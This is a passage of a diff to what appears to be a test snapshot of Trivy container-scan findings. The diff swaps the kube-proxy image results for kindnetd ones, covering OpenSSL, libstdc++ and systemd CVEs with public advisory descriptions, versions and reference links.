"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", "https://www.cve.org/CVERecord?id=CVE-2023-2650", "https://www.debian.org/security/2023/dsa-5417", "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow. Impact summary: Applications that use OBJ_obj2txt() directly, or use any of @@ -164116,8 +163827,9 @@ In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Possible DoS translating ASN.1 object identifiers", "references": [ @@ -164153,14 +163865,6 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164177,10 +163881,6 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://ubuntu.com/security/notices/USN-6119-1", }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", - }, { "type": "URL", "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", @@ -164198,93 +163898,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4160", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4160", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - "https://security.gentoo.org/glsa/202210-02", - "https://www.cve.org/CVERecord?id=CVE-2021-4160", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220128.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4160", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220128.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2097", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", @@ -164326,7 +163943,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "AES OCB fails to encrypt some bytes", "references": [ @@ -164479,10 +164096,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4304", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -164533,7 +164150,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "timing attack in RSA Decryption implementation", "references": [ @@ -164722,10 +164339,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0465", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0465", @@ -164734,8 +164351,6 @@ and the severity is therefore considered low.", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://linux.oracle.com/cve/CVE-2023-0465.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -164746,7 +164361,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be + "description": +"Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by @@ -164756,8 +164372,9 @@ in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ @@ -164789,14 +164406,6 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164830,10 +164439,10 @@ the \`-policy' argument to the command line utilities or by calling the }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0466", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0466", @@ -164842,8 +164451,6 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://linux.oracle.com/cve/CVE-2023-0466.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -164854,7 +164461,8 @@ the \`-policy' argument to the command line utilities or by calling the ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect @@ -164870,8 +164478,9 @@ enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Certificate policy check not enabled", "references": [ @@ -164903,14 +164512,6 @@ commonly used by applications.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164945,9 +164546,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2007-6755", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", @@ -164965,7 +164566,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ @@ -165023,9 +164624,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-0928", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", @@ -165041,7 +164642,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "openssl: RSA authentication weakness", "references": [ @@ -165090,612 +164691,732 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u7", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": 